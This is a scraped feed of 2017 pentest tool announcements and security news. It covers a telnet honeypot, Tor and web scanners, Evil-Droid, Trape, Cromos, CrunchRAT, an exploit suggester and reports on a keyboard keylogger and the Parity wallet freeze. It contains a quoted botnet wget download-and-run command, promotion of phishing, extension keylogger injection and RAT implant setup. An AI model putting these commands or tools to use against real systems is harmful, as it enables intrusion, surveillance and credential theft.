Quantcast
Channel: HACK4NET 🤖 Pentest Tools and News
Viewing all 541 articles
Browse latest View live

Telnet IoT Honeypot - Python Telnet Honeypot For Catching Botnet Binaries

November 6, 2017, 9:00 am
$
0
0

This project implements a python telnet server trying to act as a honeypot for IoT Malware which spreads over horribly insecure default passwords on telnet servers on the internet.
Other than https://github.com/stamparm/hontel or https://github.com/micheloosterhof/cowrie (examples), which provides full (via chroot) or simulated behaviour of a linux system this honeypots goal is just to collect statistics of (IoT) botnets. This means that the honeypot must be made to work with every form of automated telnet session, which may try to infect the honeypot with malware. Luckily, these malwares infection processes are quite simple, just using wget do download something and running it.


Architekure
The application has a client/server architekture, with a client (the actual honeypot) accepting telnet connections and a server aggregating connection data and sample analysis.
However, for local deployments, the application can also be run in local mode to eliminate the need to run a client and server locally.

Running
The application has a config file named config.py. Samples are included for local and client/server deployments.

Client/Local Mode
python honey.py

Server
python backend.py

Opening the frontend
After the server is started, open html/index.html in your favorite browser. For this to work, the url in html/apiurl.js should point to your running backend, which it should do automatically for local deployments.

Sample Connection
enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit

Images


Search

Exitmap - A Fast and Modular Scanner for TOR Exit Relays

November 7, 2017, 3:30 am
$
0
0

Exitmap is a fast and modular Python-based scanner for Tor exit relays. Exitmap modules implement tasks that are run over (a subset of) all exit relays. If you have a background in functional programming, think of exitmap as a map() interface for Tor exit relays: Modules can perform any TCP-based networking task like fetching a web page, uploading a file, connecting to an SSH server, or joining an IRC channel.



In practice, exitmap is useful to monitor the reliability and trustworthiness of exit relays. The Tor Project uses exitmap to check for false negatives on the Tor Project's check service and to find malicious exit relays. It is easy to develop new modules for exitmap; just have a look at the file HACKING in the doc/ directory or check out one of the existing modules.
Exitmap uses Stem to create circuits to all given exit relays. Each time tor notifies exitmap of an established circuit, a module is invoked for the newly established circuit. Modules can be pure Python scripts or executables. For executables, torsocks is necessary.
Finally, note that exitmap is a network measurement tool and of little use to ordinary Tor users. The Tor Project is already running the tool regularly. More exitmap scans just cause unnecessary network load. The only reason exitmap is publicly available is because its source code and design might be of interest to some.

Installation
Exitmap uses the library Stem to communicate with Tor. There are plenty of ways to install Stem. The easiest might be to use pip in combination with the provided requirements.txt file:
$ pip install -r requirements.txt

Running exitmap
The only argument exitmap requires is the name of a module. For example, you can run exitmap with the checktest module by running:
$ ./bin/exitmap checktest
The command line output will then show you how Tor bootstraps, the output of the checktest module, and a scan summary. If you don't need three hops and prefer to use two hops with a static first hop, run:
$ ./bin/exitmap --first-hop 1234567890ABCDEF1234567890ABCDEF12345678 checktest
To run the same test over German exit relays only, execute:
$ ./bin/exitmap --country DE --first-hop 1234567890ABCDEF1234567890ABCDEF12345678 checktest
If you want to pause for five seconds in between circuit creations to reduce the load on the Tor network and the scanning destination, run:
$ ./bin/exitmap --build-delay 5 checktest
Note that 1234567890ABCDEF1234567890ABCDEF12345678 is a pseudo fingerprint that you should replace with an exit relay that you control.
To learn more about all of exitmap's options, run:
$ ./bin/exitmap --help
Exitmap comes with batteries included, providing the following modules:
  • testfds: Tests if an exit relay is able to fetch the content of a simple web page. If an exit relay is unable to do that, it might not have enough file descriptors available.
  • checktest: Attempts to find false negatives in the Tor Project's check service.
  • dnspoison: Attempts to resolve several domains and compares the received DNS A records to the expected records.
  • dnssec: Detects exit relays whose resolver does not validate DNSSEC.
  • patchingCheck: Checks for file tampering.
  • cloudflared: Checks if a web site returns a CloudFlare CAPTCHA.
  • rtt: Measure round-trip times through an exit to various destinations.

Configuration
By default, exitmap tries to read the file .exitmaprc in your home directory. The file accepts all command line options, but you have to replace minuses with underscores. Here is an example:
[Defaults]
first_hop = 1234567890ABCDEF1234567890ABCDEF12345678
verbosity = debug
build_delay = 1
analysis_dir = /path/to/exitmap_scans

Alternatives
Don't like exitmap? Then have a look at tortunnelSoaTtorscannerDetecTor, or SelekTOR.

Tests
Before submitting pull requests, please make sure that all unit tests pass by running:
$ pip install -r requirements-dev.txt
$ py.test --cov-report term-missing --cov-config .coveragerc --cov=src test


Tweep - An Advanced Twitter Scraping Tool

November 7, 2017, 6:30 am
$
0
0

Tweep is an advanced Twitter scraping tool written in python that allows for scraping Tweets and pictures from Twitter profiles without using Twitter's API.

Benefits
Some of the benefits of using Tweep vs Twitter API:
  • Fast initial setup
  • Can be used anonymously
  • No rate limitations
  • Can fetch all Tweets (Twitter API limits to last 3200 Tweets)

Requirements
  • BeautifulSoup4 pip install beautifulsoup4

Usage
  • -u The user's Tweets you want to scrape.
  • -s Search for Tweets containing this word or phrase.
  • --year Filter tweets before the specified year.
  • --pics Download all the pictures from Tweets.
  • --fruit Display Tweets with "low-hanging-fruit".
  • --tweets Display Tweets only.
  • --verified Display Tweets only from verified users (Use with -s).
  • --users Display users only (Use with -s).

Low-Hanging Fruit
The --fruit feature will display Tweets that might contain sensitive info such as:
  • Profiles from leaked databases (Myspace or LastFM)
  • Email addresses
  • Phone numbers

Basic Examples and Combos.
A few simple examples to help you understand the basics:
  • python tweep.py -u username - Scrape all the Tweets from user's timeline.
  • python tweep.py -u username -s pineapple - Scrape all Tweets from the user's timeline containing pineapple.
  • python tweep.py -s pineapple - Collect every Tweet containing pineapple from everyone's Tweets.
  • python tweep.py -u username --year 2014 - Collect Tweets that were tweeted before 2014.
  • python tweep.py -u username --pics - Download all pictures from user's timeline.
  • python tweep.py -u username --fruit - Show Tweets with low-hanging fruit.
  • python tweep.py -s "Donald Trump" --verified --users - List verified users that Tweet about Donald Trump.

Example String
881653591265746945 2017-07-02 23:19:31 UTC <dqt> i need to drink more water


Evil-Droid - Framework to Create, Generate & Embed APK Payloads

November 7, 2017, 6:35 am
$
0
0

Evil-Droid is a framework that create & generate & embed apk payload to penetrate android platforms.


Screenshot:


Dependencies :
1 - metasploit-framework
2 - xterm
3 - Zenity
4 - Aapt
5 - Apktool
6 - Zipalign

Download/Config/Usage:
1 - Download the tool from github 
git clone https://github.com/M4sc3r4n0/Evil-Droid.git
2 - Set script execution permission 
cd Evil-Droid
chmod +x evil-droid
3- Run Evil-Droid Framework : 
./evil-droid
see options bellow 

Video tutorial:


Built-in Keylogger Found in MantisTek GK2 Keyboards—Sends Data to China

November 7, 2017, 6:42 am
$
0
0
Mantistek-GK2-Mechanical-Gaming-Keyboard-Keylogger
"The right keyboard can make all the difference between a victory and a defeat in a video game battlefield."

If you are a gamer, you can relate to the above quote.

But what if your winning weapon betrays you?

The popular 104-key Mantistek GK2 Mechanical Gaming Keyboard that costs around €49.66 has allegedly been caught silently recording everything you type on your keyboard and sending them to a server maintained by the Alibaba Group.

This built-in keylogger in Mantistek GK2 Mechanical Gaming Keyboard was noticed by a few owners who headed on to an online forum to share this issue.

According to Tom's Hardware, MantisTek keyboards utilise 'Cloud Driver' software, maybe for collecting analytic information, but has been caught sending sensitive information to servers tied to Alibaba.

The affected users also provided a screenshot showing how all your plain-text keystrokes collected by the keyboard are being uploaded to a Chinese server located at IP address: 47.90.52.88.

Mantistek-GK2-Mechanical-Gaming-Keyboard-Keylogger


However, since like Amazon and Google, Alibaba Group also sells cloud services, this collected information is not necessarily being sent to the Alibaba itself, but someone who is using the company's service.

Opening the IP address in question directly into a web browser and on a Chinese login page, which translates to "Cloud mouse platform background management system" and is maintained by Shenzhen Cytec Technology Co., Ltd.

Reportedly, the MantisTek keyboard's software sends the collected data to two destinations at that IP address:
  • /cms/json/putkeyusedata.php
  • /cms/json/putuserevent.php
The best way to prevent your keyboard from sending your keystrokes to the Alibaba server is to stop using your Mantistek GK2 Mechanical Gaming Keyboard until you hear back from the company about this issue.

If you cannot prevent yourself from using the keyboard, but want to stop it from sending your key presses to the Alibaba server, just make sure the MantisTek Cloud Driver software is not running in the background, and block the CMS.exe executable in your firewall.

To block the CMS.exe executable, add a new firewall rule for the MantisTek Cloud Driver in the "Windows Defender Firewall With Advanced Security."

written by Swati Khandelwal

Physicists are thinking that Quantum Particles can solve all the security Issues

November 7, 2017, 6:53 am
$
0
0
Within a few cycles, researchers displayed the system in the lab, and today quantum cryptography is displaying commercially viable recognition to companies such as ID Quantique in Geneva, Switzerland.
But the entire device is a little counterintuitive.  The private information is not sent using quantum workers at all. Instead, physicists use quantum means to send a code called a one-time pad that is used to encrypt the initial message. The encrypted message is then sent over an average telecommunications carrier and decoded in the usual way. The method is called quantum key distribution.
Computer scientists know that an information encoded using a one-time pad package be broken. So the security comes from the knowledge to send the one-time pad with perfect privacy, which is what this suggestion guarantees.
And that raises an intriguing question. If it’s possible to send the one-time pad securely using quantum workers, why not just send the primary message that way?
Today, Wei Zhang at Tsinghua University in Beijing and a few friends say they have done just this. The new method is called quantum secure direct communication, and the Chinese team has used it completed 500 meters of fiber-optic cable for the first time.
The reason scientists have relied on one-time pads in the past is simple. At issue is whether a communication has been overheard. Physicists can check this because quantum bits cannot be measured without consuming the information they contain.
So when photons are transmitted, if they arrive in the same state they were sent in, a listener cannot have extracted the data they contain. But if they arrive in a different state, that is clear evidence that the data has leaked into the background and the message is not secure.
In practice, physicists can be sure that a data is secure as long as this leakage is below some sharp threshold.
The difficulty is that the leakage becomes possible only after it has occurred. So a listener would already have the data by the time scientists found out about the ruse.

source: latesthackingnews

wig - WebApp Information Gatherer

November 7, 2017, 8:00 am
$
0
0
wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications.
The application fingerprinting is based on checksums and string matching of known files for different versions of CMSes. This results in a score being calculated for each detected CMS and its versions. Each detected CMS is displayed along with the most probable version(s) of it. The score calculation is based on weights and the amount of "hits" for a given checksum.
wig also tries to guess the operating system on the server based on the 'server' and 'x-powered-by' headers. A database containing known header values for different operating systems is included in wig, which allows wig to guess Microsoft Windows versions and Linux distribution and version.



Requirements
wig is built with Python 3, and is therefore not compatible with Python 2.

Installation
wig can be run from the command line or installed with distuils.

Command line
$ python3 wig.py example.com

Usage in script
Install with
$ python3 setup.py install
and then wig can be imported from any location as such:
>>>> from wig.wig import wig
>>>> w = wig(url='example.com')
>>>> w.run()
>>>> results = w.get_results()

How it works
The default behavior of wig is to identify a CMS, and exit after version detection of the CMS. This is done to limit the amount of traffic sent to the target server. This behavior can be overwritten by setting the '-a' flag, in which case wig will test all the known fingerprints. As some configurations of applications do not use the default location for files and resources, it is possible to have wig fetch all the static resources it encounters during its scan. This is done with the '-c' option. The '-m' option tests all fingerprints against all fetched URLs, which is helpful if the default location has been changed.

Help Screen
usage: wig.py [-h] [-l INPUT_FILE] [-q] [-n STOP_AFTER] [-a] [-m] [-u] [-d]
              [-t THREADS] [--no_cache_load] [--no_cache_save] [-N]
              [--verbosity] [--proxy PROXY] [-w OUTPUT_FILE]
              [url]

WebApp Information Gatherer

positional arguments:
  url              The url to scan e.g. http://example.com

optional arguments:
  -h, --help       show this help message and exit
  -l INPUT_FILE    File with urls, one per line.
  -q               Set wig to not prompt for user input during run
  -n STOP_AFTER    Stop after this amount of CMSs have been detected. Default:
                   1
  -a               Do not stop after the first CMS is detected
  -m               Try harder to find a match without making more requests
  -u               User-agent to use in the requests
  -d               Disable the search for subdomains
  -t THREADS       Number of threads to use
  --no_cache_load  Do not load cached responses
  --no_cache_save  Do not save the cache for later use
  -N               Shortcut for --no_cache_load and --no_cache_save
  --verbosity, -v  Increase verbosity. Use multiple times for more info
  --proxy PROXY    Tunnel through a proxy (format: localhost:8080)
  -w OUTPUT_FILE   File to dump results into (JSON)

Example of run:
$ python3 wig.py example.com

wig - WebApp Information Gatherer


Redirected to http://www.example.com
Continue? [Y|n]:
Scanning http://www.example.com...
_____________________________________________________ SITE INFO _____________________________________________________
IP                        Title                                                                                      
256.256.256.256           PAGE_TITLE                                 

______________________________________________________ VERSION ______________________________________________________
Name                      Versions                                               Type                                
Drupal                    7.38                                                   CMS                                 
nginx                                                                            Platform                            
amazons3                                                                         Platform                            
Varnish                                                                          Platform                            
IIS                       7.5                                                    Platform                            
ASP.NET                   4.0.30319                                              Platform                            
jQuery                    1.4.4                                                  JavaScript                          
Microsoft Windows Server  2008 R2                                                OS                                  

_____________________________________________________ SUBDOMAINS ____________________________________________________
Name                      Page Title                                             IP                                  
http://m.example.com:80   Mobile Page                                            256.256.256.257                     
https://m.example.com:443 Secure Mobil Page                                      256.256.256.258                     

____________________________________________________ INTERESTING ____________________________________________________
URL                       Note                                                   Type                                
/test/                    Test directory                                         Interesting                         
/login/                   Login Page                                             Interesting                         

_______________________________________________ PLATFORM OBSERVATIONS _______________________________________________
Platform                  URL                                                    Type                                
ASP.NET 2.0.50727         /old.aspx                                              Observation                         
ASP.NET 4.0.30319         /login/                                                Observation                         
IIS 6.0                   http://www.example.com/templates/file.css              Observation                         
IIS 7.0                   https://www.example.com/login/                         Observation                         
IIS 7.5                   http://www.example.com                                 Observation                         

_______________________________________________________ TOOLS _______________________________________________________
Name                      Link                                                   Software                            
droopescan                https://github.com/droope/droopescan                   Drupal                              
CMSmap                    https://github.com/Dionach/CMSmap                      Drupal                              

__________________________________________________ VULNERABILITIES __________________________________________________
Affected                  #Vulns                                                 Link                                
Drupal 7.38               5                                                      http://cvedetails.com/version/185744

_____________________________________________________________________________________________________________________
Time: 11.3 sec            Urls: 310                                              Fingerprints: 37580


Trape - People tracker on the Internet (The evolution of phishing attacks) OSINT

November 7, 2017, 10:00 am
$
0
0

Trape is a recognition tool that allows you to track people, the information you can get is very detailed. We want to teach the world through this, as large Internet companies could monitor you, obtaining information beyond your IP.



Some benefits
  • One of its most enticing functions is the remote recognition of sessions. You can know where a person has logged in, remotely. This occurs through a Bypass made to the Same Origin Policy (SOP)
  • Currently you can try everything from a web interface. (The console, becomes a preview of the logs and actions)
  • Registration of victims, requests among other data are obtained in real time.
  • If you get more information from a person behind a computer, you can generate a more direct and sophisticated attack. Trape was used at some point to track down criminals and know their behavior.
  • You can do real time phishing attacks
  • Simple hooking attacks
  • Mapping
  • Important details of the objective
  • Capturing credentials
  • Open Source Intelligence (OSINT)

Recognizes the sessions of the following services
  • Facebook
  • Twitter
  • VK
  • Reddit
  • Gmail
  • tumblr
  • Instagram
  • Github
  • Bitbucket
  • Dropbox
  • Spotify
  • PayPal
  • Amazon

How to use it
First unload the tool.
git clone https://github.com/boxug/trape.git
cd trape
python trape.py -h
If it does not work, try to install all the libraries that are located in the file requirements.txt
pip install -r requirements.txt
Example of execution
Example: python trape.py --url http://example.com --port 8080
  • In the option --url you must put the lure, can be a news page, an article something that serves as a presentation page.
  • In the --port option you just put the port where you want it to run
  • Do you like to monitor your people? Everything is possible with Trape
  • Do you want to perform phishing attacks? Everything is possible with Trape
  • In the Files directory, located on the path: /static/files here you add the files with .exe extension or download files sent to the victim.

Here are some simple videos to use:
Spanishhttps://www.youtube.com/watch?v=ptyuCQmMKiQ
Englishhttps://www.youtube.com/watch?v=FdwyIZhUx3Y
At an international security event in Colombia, called DragonJAR Security Conference 2017, a demonstration was made before the launch. You can watch the video here: https://www.youtube.com/watch?v=vStSEsznxgE

Disclaimer
This tool has been published educational purposes in order to teach people how bad guys could track them or monitor them or obtain information from their credentials, we are not responsible for the use or the scope that may have the People through this project.
We are totally convinced that if we teach how vulnerable things are, we can make the Internet a safer place.

Developers or participants
The following people are part of the core of development and research in Boxug.
This development and others, the participants will be mentioned with name, Twitter and charge.


Search

Kernelpop - Kernel Privilege Escalation Enumeration And Exploitation Framework

November 7, 2017, 11:30 am
$
0
0

kernelpop is a framework for performing automated kernel exploit enumeration on Linux, Mac, and Windows hosts.

Requirements
python3

Currently supported CVE's:
*CVE-2017-1000367
*CVE-2017-1000112
*CVE-2017-7308
*CVE-2017-6074
*CVE-2017-5123
*CVE-2016-5195
*CVE-2016-2384
*CVE-2016-0728
*CVE-2015-7547
*CVE-2015-1328
*CVE-2014-4699
*CVE-2014-4014
*CVE-2014-3153
*CVE-2014-0196
*CVE-2009-1185

Run modes

default mode
The default mode runs with the command python3 kernelpop.py. This processes information about the host kernel and compares it to the known kernel exploits available to the program. It then outputs a list of potentially useful vulnerabilities and attached exploits.


brute-enumeration mode
The brute-enumeration mode performs the same checks, but then goes beyond and checks the computer for exploit prerequisites to see if the operating system is set up in the required vulnerable state for successful exploitation.



input mode
The input mode allows you to perform enumeration with just the output of a uname -a command, which makes it useful as a host-side enumeration tool.



One feature currently only partially implemented is brute-exploit mode. This is set to prepare, compile, and run exploits in order to confirm an exploitable kernel. However, as of now it would only run on the box the program is executed on. Given that this is a fairly large project to bring on to someone else's computer, and makes considerable noise when compiling and checking exploit attempts, it would be poor OPSEC to use in an actual engagement. At some point in the future, I would like to integrate it into my other project pysploit for enumeration and the reckless, noisy, exploity brute-exploit mode.

Exploit sources
https://github.com/SecWiki/linux-kernel-exploits
https://www.exploit-db.com/local/
https://github.com/SecWiki/windows-kernel-exploits


Striker - Offensive Information And Vulnerability Scanner

November 8, 2017, 6:18 am
$
0
0

Striker is an offensive information and vulnerability scanner.

Features
Just supply a domain name to Striker and it will automatically do the following for you:
  • Check and Bypass Cloudflare
  • Retrieve Server and Powered by Headers
  • Fingerprint the operating system of Web Server
  • Detect CMS (197+ CMSs are supported)
  • Launch WPScan if target is using Wordpress
  • Retrieve robots.txt
  • Check if the target is a honeypot
  • Port Scan with banner grabbing
  • Dumps all kind of DNS records
  • Generate a map for visualizing the attack surface
  • Gather Emails related to the target
  • Find websites hosted on the same web server
  • Find hosts using google
  • Crawl the website for URLs having parameters
  • SQLi scan using online implemention of SQLMap (takes < 3 min.)
  • Basic XSS scanning



Screenshots






Oh, Crap! Someone Accidentally Triggered A Flaw That Locked Up $280 Million In Ethereum

November 8, 2017, 8:45 am
$
0
0

Horrible news for some Ethereum users.

About $300 million worth of Ether—the cryptocurrency unit that has become one of the most popular and increasingly valuable cryptocurrencies—from dozens of Ethereum wallets was permanently locked up today.

Smart contract coding startup Parity Technologies, which is behind the popular Ethereum Parity Wallet, announced earlier today that its "multisignature" wallets created after this July 20 contains a severe vulnerability that makes it impossible for users to move their funds out of those wallets.

According to Parity, the vulnerability was triggered by a regular GitHub user, "devops199," who allegedly accidentally removed a critical library code from the source code that turned all multi-sig contracts into a regular wallet address and made the user its owner.

Devops199 then killed this wallet contract, making all Parity multisignature wallets tied to that contract instantly useless, and therefore their funds locked away with no way to access them.
"These (https://pastebin.com/ejakDR1f) multi_sig wallets deployed using Parity were using the library located at "0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4" address," devops199 wrote on GitHub.
"I made myself the owner of '0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4' contract and killed it and now when I query the dependent contracts 'isowner(<any_addr>)' they all return TRUE because the delegate call made to a died contract."

Parity multisignature wallets also experienced a vulnerability in July this year that allowed an unknown hacker to steal nearly $32 million in funds (approximately 153,000 units of Ether) before the Ethereum community secured the rest of its vulnerable Ether.

According to Parity, a new version of the Parity Wallet library contract deployed on 20th of July contained a fix to address the previously exploited multi-sig flaw, but the code "still contained another issue," which made it possible to turn the Parity Wallet library contract into a regular wallet.

The vulnerability affected Parity multi-sig wallets that were deployed after July 20—meaning ICOs (Initial Coin Offerings) that were held since then may be impacted.

So far, it is unclear exactly how much cryptocurrency has disappeared due to this blunder, but some cryptocurrency blogs have reported that Parity wallets constitute roughly 20% of the entire Ethereum network.

This made researchers familiar with the space estimating around $280 Million worth of Ether is now inaccessible at this time, including $90 million of which was raised by Parity's founder Gavin Woods.

Parity froze all affected multi-sig wallets (that is millions of dollars' worth of Ethereum-based assets) as its team scrambles to bolster security. The team also promised to release an update with further details shortly.

Cromos - Download and Inject code into Google Chrome extensions

November 8, 2017, 8:54 am
$
0
0

Cromos is a tool for downloading legitimate extensions of the Chrome Web Store and inject codes in the background of the application and more cromos create executable files to force installation via PowerShell for example, and also upload files to dropbox to host the malicious files.
  • Download extension
  • Injections
  • Upload files on dropbox
  • Windows infection



Group Policy Object (GPO)
Chrome allows you to add extensions using Windows Group Policy Object (GPO) if you need to force installation on multiple machines just follow the steps in the Chrome Deployment Guide then modify the original extension with few modifications you can publish your extension in the Chrome Web Store requires to pay $5.

Support
If you chose to generate a batch file to force installation the script in powershell that will be downloaded is compatible Windows, 7, 8 10 with versions of powershell >= 3.0

Demo
This is a demonstration of the tool at work in this examples I'm downloading a famous Google extension called G Suite Training on Google Chrome Web Store and injecting a keylogger module.

Installation
$ cd $HOME/
$ git clone https://github.com/fbctf/cromos
$ sudo chmod -R 777 cromos/
$ cd cromos && python setup.py

Usage

Downloading the extension
Usage: python cromos.py --extension {id}

Downloading the extension and loading module
Usage: python cromos.py --extension {id} --load {currency/keylogger}

Build a batch file and upload the files in dropbox
Usage: python cromos.py --extension {id} --build {bat} --token {dropboxToken}

Modules
You can also inject some predefined modules in the background as keyloggervirtual currency.
ModuleDescription
modules/keyloggerThis module captures all the passwords you type in an infected browser over https or not. All you need is to have a php server for example to receive the requests get the parameters are email, password, cookies and userAgent.
modules/currencyThis module allows you to mine virtual coins using the coinhive API, you just need to have an account.


KRACK Detector - Detect and prevent KRACK attacks in your network

November 8, 2017, 10:30 am
$
0
0

KRACK Detector is a Python script to detect possible KRACK attacks against client devices on your network. The script is meant to be run on the Access Point rather than the client devices. It listens on the Wi-Fi interface and waits for duplicate message 3 of the 4-way handshake. It then disconnects the suspected device, preventing it from sending any further sensitive data to the Access Point.
KRACK Detector currently supports Linux Access Points with hostapd. It uses Python 2 for compatibility with older operating systems. No external Python packages are required.




Usage
Run as root and pass the Wi-Fi interface as a single argument. It is important to use the actual Wi-Fi interface and not any bridge interface it connects to.
python krack_detect.py wlan0
If you do not wish to disconnect suspected devices, use the -n flag
python krack_detect.py -n wlan0

Known Issues
Message 3 of the 4-way handshake might be retransmitted even if no attack is perfomed. In such a case the client device will be disconnected from the Wi-Fi network. Some client devices will take some time to re-authenticate themselves, losing the Wi-Fi connection for a few seconds.


Linux Soft Exploit Suggester - Search Exploitable Software On Linux

November 8, 2017, 12:00 pm
$
0
0

linux-soft-exploit-suggester finds exploits for all vulnerable software in a system helping with the privilege escalation. It focuses on software packages instead of Kernel vulnerabilities.



> python linux-soft-exploit-suggester.py -h

  |  _         __ _  _ |    _    _ | _  |    __    __  __  _  __ |   _  _
  |·| || |\/  (_ | ||_ |-  /_)\/| \|| |·|-  (_ | ||  )|  )/_)(_  |- /_)|
  ||| ||_|/\  __)|_||  |_  \_ /\|_/||_|||_  __)|_||_/ |_/ \_ __) |_ \_ |
                                |                 _/  _/

linux-soft-exploit-suggester:
  Search for Exploitable Software from package list.

optional arguments:
  -h, --help            Show this help message and exit
  -f FILE, --file FILE  Package list file
  --clean               Use clean package list, if used 'dpkg-query -W'
  --duplicates          Show duplicate exploits
  --db DB               Exploits csv file [default: file.csv]
  --update              Download latest version of exploits db
  -d debian|redhat, --distro debian|redhat
                        Linux flavor, debian or redhat [default: debian]
  --dos                 Include DoS exploits
  --intense             Include intense package name search,
                        when software name doesn't match package name (experimental)
  -l 1-5, --level 1-5   Software version search variation [default: 1]                        
                          level 1: Same version                        
                          level 2: Micro and Patch version                        
                          level 3: Minor version                        
                          level 4: Major version                        
                          level 5: All versions
  --type TYPE           Exploit type; local, remote, webapps, dos.
                          e.g. --type local
                         --type remote
  --filter FILTER       Filter exploits by string
                          e.g. --filter "escalation"

usage examples:     
  Get Package List:
 debian/ubuntu: dpkg -l > package_list
 redhat/centos: rpm -qa > package_list

  Update exploit database:
 python linux-soft-exploit-suggester.py --update

  Basic usage:
 python linux-soft-exploit-suggester.py --file package_list

  Specify exploit db:
 python linux-soft-exploit-suggester.py --file package_list --db file.cve

  Use Redhat/Centos format file:
 python linux-soft-exploit-suggester.py --file package_list --distro redhat

  Search exploit for major version:
 python linux-soft-exploit-suggester.py --file package_list --level 4

  Filter by remote exploits:
 python linux-soft-exploit-suggester.py --file package_list --type remote

  Search specific words in exploit title:
 python linux-soft-exploit-suggester.py --file package_list --filter Overflow

  Advanced usage:
 python linux-soft-exploit-suggester.py --file package_list --level 3 --type local --filter escalation

Output
> python linux-soft-exploit-suggester.py --file packages --db file.csv

  |  _         __ _  _ |    _    _ | _  |    __    __  __  _  __ |   _  _
  |·| || |\/  (_ | ||_ |-  /_)\/| \|| |·|-  (_ | ||  )|  )/_)(_  |- /_)|
  ||| ||_|/\  __)|_||  |_  \_ /\|_/||_|||_  __)|_||_/ |_/ \_ __) |_ \_ |
                                |                 _/  _/

[+] DNSTracer 1.9 - Buffer Overflow - local
  From: dnstracer 1.9
  File: /usr/share/exploitdb/platforms/linux/local/42424.py
  Url: https://www.exploit-db.com/exploits/42424
[+] GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution - remote
  From: wget 1.17.1
  File: /usr/share/exploitdb/platforms/linux/remote/40064.txt
  Url: https://www.exploit-db.com/exploits/40064
[+] GNU Screen 4.5.0 - Privilege Escalation (PoC) - local
  From: screen 4.3.1
  File: /usr/share/exploitdb/platforms/linux/local/41152.txt
  Url: https://www.exploit-db.com/exploits/41152
[+] Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit) - local
  From: ghostscript 9.21
  File: /usr/share/exploitdb/platforms/linux/local/41955.rb
  Url: https://www.exploit-db.com/exploits/41955
[+] KeepNote 0.7.8 - Command Execution - local
  From: keepnote 0.7.8
  File: /usr/share/exploitdb/platforms/multiple/local/40440.py
  Url: https://www.exploit-db.com/exploits/40440
[+] MAWK 1.3.3-17 - Local Buffer Overflow - local
  From: mawk 1.3.3
  File: /usr/share/exploitdb/platforms/linux/local/42357.py
  Url: https://www.exploit-db.com/exploits/42357
[+] Sudo 1.8.20 - 'get_process_ttyname()'Privilege Escalation - local
  From: sudo 1.8.20
  File: /usr/share/exploitdb/platforms/linux/local/42183.c
  Url: https://www.exploit-db.com/exploits/42183

...

Generate package list

Debian
dpkg -l > package_list

Red Hat
rpm -qa > package_list

TIP. Packages from running processes and SETUID binaries

Running packages
> for i in $(ps auex|sed -e ':l;s/  / /g;t l'|cut -d'' -f11|grep -v '\['|grep '/'|sort -u); \
  do \
  dpkg -l | grep "^ii  `dpkg -S $i 2>&1|cut -d':' -f1`" |tee -a potentials; \
  done

SETUID Binaries
> for i in $(find / -perm -4000 -o -perm -2000 -type f 2>/dev/null); \
  do \
  dpkg -l | grep "^ii  `dpkg -S $i 2>&1|cut -d':' -f1`"|tee -a potentials; \
  done

Eliminate duplicates and Run
> sort -u potentials > potentials_no_duplicates
> python linux-soft-exploit-suggester.py --file potentials_no_duplicates --level 2 --type local

  |  _         __ _  _ |    _    _ | _  |    __    __  __  _  __ |   _  _
  |·| || |\/  (_ | ||_ |-  /_)\/| \|| |·|-  (_ | ||  )|  )/_)(_  |- /_)|
  ||| ||_|/\  __)|_||  |_  \_ /\|_/||_|||_  __)|_||_/ |_/ \_ __) |_ \_ |
                                |                 _/  _/

[+] Sudo 1.8.20 - 'get_process_ttyname()'Privilege Escalation - local
  From: sudo 1.8.20
  File: /usr/share/exploitdb/platforms/linux/local/42183.c
  Url: https://www.exploit-db.com/exploits/42183
[+] Fuse 2.9.3-15 - Privilege Escalation - local
  From: fuse 2.9.7
  File: /usr/share/exploitdb/platforms/linux/local/37089.txt
  Url: https://www.exploit-db.com/exploits/37089


CrunchRAT - HTTPS-based Remote Administration Tool (RAT)

November 8, 2017, 1:00 pm
$
0
0

CrunchRAT currently supports the following features:
  • File upload
  • File download
  • Command execution
It is currently single-threaded (only one task at a time), but multi-threading (or multi-tasking) is currently in the works. Additional features will be included at a later date.

Server
The server-side of the RAT uses PHP and MySQL. The server-side of the RAT has been tested and works on the following:
  • Ubuntu 15.10 (Desktop or Server edition)
  • Ubuntu 16.04 (Desktop or Server edition)
Once the latest RAT code has been downloaded, there will be three directories:
  • Client - Contains implant code (ignore for the this section)
  • Server - Contains server code
  • Setup - Contains setup files

Dependencies Setup
  1. Within the Setup directory, there are two dependencies setup shell scripts. If you are using Ubuntu 15.10 run sh 15_10_dependencies.sh, and if you're using Ubuntu 16.04 run sh 16_04_dependencies.shNote: This needs to be run as root. Failure to run with root privileges will result in an error.
  2. When asked for a new MySQL root password, please choose one that is complex. This information is needed at a later step.

HTTPS Setup
  1. CrunchRAT uses a self-signed certificate to securely communicate between the server and implant. Run the https_setup.sh shell script with the Setup directory to automate the HTTPS setup. Note: This needs to be run as root. Failure to run with root privileges will result in an error. When asked to fill out the certificate information (Country Name, etc), please fill out all information. Snort rules already exist to alert on the dummy OpenSSL certificates. Don't be that guy that gets flagged by not filling out this information.

Database Setup
  1. Run the database_setup.sh shell script within the Setup directory to setup the MySQL database.
  2. CrunchRAT creates a default RAT account with the admin:changeme credentials. Please log into the web end of the RAT and change the default password. Once logged into the web end of the RAT, go to Account Management--> Change Passwordto successfully change the default password to something more complex. Additional RAT users can be provisioned using Account Management --> Add Users.

Miscellaneous Setup
  1. Copy all files from the Server directory to the webroot.
  2. You will want to create a downloads directory as well. Note: It is absolutely critical that you don't put this folder in the webroot. I typically create this directory in the /home/<USERNAME> directory. You will want to make sure that www-data can access this directory with the following command sudo chown www-data:www-data downloads. This directory will store all of the files downloaded from the infected system(s).
  3. In the webroot, open the config/config.php file. This is the main RAT configuration file. Make sure that you update all of the variables (downloadsPath, dbUser, dbPass, etc) to match your environment.

Client
CrunchRAT is written in C# for simplicity. The C# binary does not have a persistence mechanism in place, but plans to write a C++stager are currently in the works.
Targeted Framework: .NET Framework 3.5 (enabled by default on Windows 7 systems)
  1. Create a new console project in Visual Studio
  2. Copy implant.cs code from Client directory and add it to the project.
  3. Change Output Type to Windows Application (this will hide the command window) (Project --> Properties --> Output Type).
  4. Make sure Target Framework is .NET Framework 3.5.
